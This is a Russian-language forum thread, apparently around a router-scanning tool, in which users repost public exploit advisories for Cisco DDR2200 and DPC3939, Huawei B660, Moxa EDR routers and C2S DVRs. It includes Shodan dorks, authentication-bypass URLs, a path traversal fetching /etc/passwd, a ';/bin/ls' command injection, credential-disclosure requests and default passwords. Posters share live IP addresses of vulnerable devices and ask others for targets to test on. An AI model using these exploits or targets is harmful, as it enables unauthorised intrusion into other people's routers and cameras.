И при чем тут RS? Это можно сделать vistumbler + usb gps. Сам так делал, точки определяются на карте с уровнем сигналов, в инете есть инструкция по настройке связки.
У @Fusix была идея прикрутить подобную функцию к Android приложению 3WiFi. Если он это сделает, то есть смысл поручить ему добавление этой же функциональности в RS. Правда вестей от него давно нет на эту тему.
интересный эксплойт на Cisco DDR2201 Spoiler *Issue Description* Some of Cisco DDR2200 router series, show some vulnerabilities as, authentication bypass, Remote code execution and path traversal As a result, an attacker can gain access to the router configuration, access to internal files and a limited command execution. *Shodan Dork* http.title:"Cisco DDR2201v1 ADSL2+ Residential Gateway" http.title:"Cisco DDR2200 ADSL2+ Residential Gateway" *Affected Components* *Device*: Cisco DDR2201v1 ADSL2+ Residential Gateway *Software Version*: DDR2201v1-NA-AnnexA-FCC-V00.00.03.28.3 Path TraversalA A A Bypass Authentication Remote code execution (RCE) *Device*: Cisco DDR2200 ADSL2+ Residential Gateway *Software Version*: DDR2200B-NA-AnnexA-FCC-V00.00.03.45.4E Remote code execution (RCE) Path TraversalA A A *Vulnerabilities details* Bypass Authentication Some pages donat need the user to be authenticated to gain access http://192.168.0.1:8080/info.html http://192.168.0.1:8080/wancfg.cmd?action=view http://192.168.0.1:8080/rtroutecfg.cmd?action=view http://192.168.0.1:8080/arpview.cmd http://192.168.0.1:8080/cpuview.cmd http://192.168.0.1:8080/memoryview.cmd http://192.168.0.1:8080/statswan.cmd http://192.168.0.1:8080/statsatm.cmd http://192.168.0.1:8080/scsrvcntr.cmd?action=view http://192.168.0.1:8080/scacccntr.cmd?action=view http://192.168.0.1:8080/logview.cmd http://192.168.0.1:8080/voicesipview.cmd http://192.168.0.1:8080/voicesipview.cmd?view=advanced http://192.168.0.1:8080/usbview.cmd http://192.168.0.1:8080/wlmacflt.cmd?action=view http://192.168.0.1:8080/wlwds.cmd http://192.168.0.1:8080/wlstationlist.cmd http://192.168.0.1:8080/HPNAShow.cmd http://192.168.0.1:8080/HPNAView.cmd http://192.168.0.1:8080/qoscls.cmd?action=view http://192.168.0.1:8080/qosqueue.cmd?action=view http://192.168.0.1:8080/portmap.cmd http://192.168.0.1:8080/scmacflt.cmd?action=view http://192.168.0.1:8080/scinflt.cmd?action=view http://192.168.0.1:8080/scoutflt.cmd?action=view http://192.168.0.1:8080/certlocal.cmd?action=view http://192.168.0.1:8080/certca.cmd?action=view http://192.168.0.1:8080/waitPingqry.cgi http://192.168.0.1:8080/PingMsg.cmd *Path Traversal* The page used to download the configuration file, is vulnerable to path traversal, that allow an attacker to download any system file. http://192.168.0.1:8080/download.conf?filename=/etc/passwd *Remote code execution (RCE)* *Description* The ping function allows arbitrary code execution. Just add a ; and then the full path of a binary: http://192.168.0.1:8080/waitPingqry.cgi?showPingResult=1&pingAddr=;/bin/ls After the previous request finish, just access the follow page to see the output http://192.168.0.1:8080/PingMsg.cmd но что-то не получается найти дорк на шодане для эксперимента. никому не попадался случайно такой роутер? если есть адресок-было-бы интересно проверить...
спасибо за помощь. то, что в описании эксплойта указан дорк я видел. видимо неправильно выразился. почему-то у меня он на шодане не срабатывал. ничего не выдавал по запросу. по этому запросу тоже искал. нашел парочку, но видимо что-то не то. конфиг скачивает, а в конфиге только парочка html тегов в тех айпишиках, что нашел exet все намного лучше
прикольный эесплойт на роутер Huawei Flybox B660. Spoiler: exploit Document Title: =============== Huawei Flybox B660 3G/4G Router - Auth Bypass Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2010 Huawei ID: 558969357627813 Release Date: ============= 2016-11-18 Vulnerability Laboratory ID (VL-ID): ==================================== 2010 Common Vulnerability Scoring System: ==================================== 7.4 Product & Service Introduction: =============================== The Huawei B660 has a web interface for configuration. You can use any web browser you like to login to the Huawei B660. Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a security flaw that affects the official Huawei Flybox B660 3g/4g router product series. Vulnerability Disclosure Timeline: ================================== 2016-11-18: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Huawei Product: Flybox - Router (Web-Application) B660 3G/4G Exploitation Technique: ======================= Remote Severity Level: =============== Critical Technical Details & Description: ================================ A remote auth bypass vulnerability has been discovered in the official Huawei Flybox B660 3g/4g router product series. The security vulnerability allows remote attackers to compromise any Huawei Flybox B660 Admin Panel using a new a bypass method. The vulnerability is located in the `./htmlcode/html/` modules and `indexdefault.asp ` file of localhost path URL. Remote attackers are able to compromise any Huawei Flybox B660 admin panel via unauthenticated GET method request. The security risk of the issue is estimated as critical with a cvss count of 7.4. (CVSS 7.4) Exploitation of the web vulnerability requires no privileged account or user interaction. Successful exploitation of the vulnerability results in compromise of the huawei flybox device. Request Method(s): [+] GET Vulnerable Module(s): [+] /htmlcode/html/ Vulnerable File(s): [+] indexdefault.asp Software version of the modem: 1066.12.15.01.200 Hardware version of the modem: WLB3TCLU Name of the device: B660 Hardware version of the router: WL1B660I001 Software version of the router: 1066.11.15.02.110sp01 Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without privileged user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. After buying a Flybox Huawei B660, the company setup a password for you like: "admin", "12345" or "55555" We figured out that when you lose your password, you can perform to connect multiple times by using the plain passwords above. After the third request the connection will be refused by an exception message, by intercepting the request and passing the error it is possible to bypass the authentication mechanism of the 3g/4g router device. The problem in Flybox Huawei B660 is the following, there is no test if the password false or true. If an attacker tries the false password of many times on requests they redirect you after the bypass of the error to change your password permanently. --- PoC Session Logs [GET] --- GET /htmlcode/html/contentdefault.asp HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, lzma, sdch Accept-Language: en-US,en;q=0.8 Cookie: login_url=settings; CNZZDATA1260483764=1049902387-1478277586-%7C1478277586; Basic=index; Language=en; SessionID_R3=1006428909 Referer: http://localhost/htmlcode/html/content.asp Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36 OPR/41.0.2353.46 HTTP/1.1 200 OK CACHE-CONTROL: no-cache Content-Length: 5776 Content-Type: text/html PoC Video: на видео интересно выглядит. посмотрим на практике. буду пробовать.может кто еще заинтересуется. п.с. этот эксплойт напоминает один старый айтишный анекдот Spoiler чукотский хакер взломал анб. техника атаки -вводил пароль админ:админ до тех пор, пока сервер с ним не согласился
эксплойт на moxa Industrial Secure Routers Spoiler: exploit Title: Industrial Secure Routers - Insecure Configuration Management Type: Local/Remote Author: Nassim Asrir Author Company: HenceForth Impact: Insecure Configuration Management Risk: (4/5) Release Date: 22.10.2016 Summary: Moxa's EDR series industrial Gigabit-performance secure routers are designed to protect the control networks of critical facilities while maintaining fast data transmissions. The EDR series security routers provides integrated cyber security solutions that combine industrial firewall, VPN, router, and L2 switching* functions into one product specifically designed for automation networks,which protects the integrity of remote access and critical devices. description: Using this Vulnerability we can change the Admin configuration without knowing Password & Username Because the form for change the configurations is Insecure. Vendor: http://www.moxa.com/product/Industrial_Secure_Routers.htm Affected Version: EDR-810, EDR-G902 and EDR-G903 Tested On: Linux // Dist (Bugtraq 2) Vendor Status: I told them and i wait for the answer. PoC: - when you navigate the server automatically you redirect to the login page (http://site/login.asp). - so Just add in the end of URL (admin.htm) then you get the Form to change the Admin configurations. пример Spoiler http://69.146.238.139/admin.htm в шодане нашел по запросу-EDR-G902 п.с. кого интересует тема айпикамер. эксплойт на C2S DVR (если баян-прошу простить). Spoiler: exploit 1. Advisory Information ======================================== Title : C2S DVR Management Remote Credentials Disclosure & Authentication Bypass Vendor Homepage : http://www.cash2s.com/en/ Remotely Exploitable : Yes Tested on Camera types : IRDOME-II-C2S, IRBOX-II-C2S, DVR Vulnerabilities : Credentials Disclosure + : Authentication bypass Date : 19/08/2016 Shodan Dork : html:write.cgi "Content-length: 2676" Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman) 2. CREDIT ======================================== This vulnerability was identified during penetration test by Yakir Wizman. 3. Description ======================================== C2S DVR allows to unauthenticated user disclose the username & password remotely by simple request to the server page 'read.cgi?page=2' which can be made by browser or burp/fiddler. Moreover, an attacker could easily access to password change page without any authentication, thats happen cuase the web application does not perform any session management. 4. Proof-of-Concept: ======================================== Remote Credentials Disclosure: ----------------------------------------------- Simply go to the following url to read the credentials: http://host:port/cgi-bin/read.cgi?page=2 Should return some javascript variable which contain the credentials and other configuration vars: var pw_enflag = "1"; var pw_adminpw = "12345"; var pw_retype1 = "12345"; var pw_userpw = "56789"; var pw_retype2 = "56789"; var pw_autolock = "0"; Login @ http://host:port/ ----------------------------------------------- Authentication Bypass: ----------------------------------------------- The application does not require a valid session for any page on the server, for example you can access to 'password.htm' which allows you to change/disclose the admin password with just a few clicks. http://host:port/password.htm?parm1=&parm2=1 пример Spoiler http://82.127.159.231:81/cgi-bin/read.cgi?page=2
Может ошибка при копировании дорка была? Там если первый или последний символ отсутствует, то ничего не найдет, точнее выдаст ошибку. А так все находит, только очень много протухших айпи.
да.потом разобрался.лишний пробел воткнул и не заметил а айпишников действительно много протухших. вот искал парочку айпишников проверить сплойт на роутер белл(такое старое дсл-г...) и вестерн дигитал айклод.нашел только в индии и ни один айпишник не отвечает
Прошу добавить определение для новой прошивки(Ростелеком) Huawei HG8245H. У всех пара root:admin https://yadi.sk/d/wX-7y6us3La3FV И посмотреть QTECH QBR-1041WU MTS. (engineer:amplifier:...:161) Прошивки одни и те же, вплоть до даты/времени, но не определяются: https://yadi.sk/d/1VNpG2fi3LaA9k
to binarymaster. Жаль что поддержку графической капчи на ZTE ZXHN H168N V3.1 не ввели. Смотрел на диапазонах прова(решил упоротся проверкой вручную, проверил около 50-ти случайной выборкой). ~каждый 5-7-мой девайс, - с дефолтной парой. А их так много(!).
свежнький эксплойт на циско DPC3939. для роутерскана не годится, но в локалке вроде работает. может кому сгодится для общей информации Spoiler: exploit Bastille Tracking Number 22 CVE-2017-9479 Overview A vulnerability has been discovered that enables an attacker to launch applications on a gateway as a root user. This vulnerability can be exploited by an attacker connected to the LAN, private Wi-Fi AP, or Xfinity Home Security AP. Affected Platforms Cisco DPC3939, firmware version dpc3939-P20-18-v303r20421746-170221a-CMCST Proof-of-Concept The syseventd service provides a mechanism to launch applications on the gateway in response to certain events, such as the one-minute cron job firing. The sysevent command line application is used to communicate with the syseventd server, which is open on port 52378 to the LAN, private Wi-Fi AP, and Xfinity Home Security Wi-Fi AP. An attacker on one of the above networks can take advantage of this, using the sysevent command line application to launch applications on the gateway. The following two commands, when executed from a computer connected to an Xfinity Home Security Wi-Fi AP, will cause the persistent storage configuration data to be copied to /var/IGD/. This can then be retrieved by the attacker. ./sysevent --port 52367 --ip 172.16.12.1 async </path/to/file> /bin/cp ./sysevent --port 52367 --ip 172.16.12.1 set </path/to/file> /var/IGD/<file> Test Environment Cisco DPC3939, firmware version dpc3939-P20-18-v303r20421746-170221a-CMCST Mitigation There is no apparent mechanism to allow Comcast customers to disable syseventd access. Recommended Remediation Update the firewall rules to disable access to syseventd from the LAN, private Wi-Fi AP, and Xfinity Home Security Wi-Fi AP. Credits Marc Newlin and Logan Lamb, Bastille Chris Grayson, Web Sight.IO
Может с выходом офф. релиза @binarymaster создаст новую тему, у него появится редактирование ОП поста, новичкам легче найти программу, да и тема разрослась. И еще, в linux под wine хотелось бы новую фишку. https://habrastorage.org/web/6fe/08f/92f/6fe08f92fc4840d7a74a26e08f013d93.png
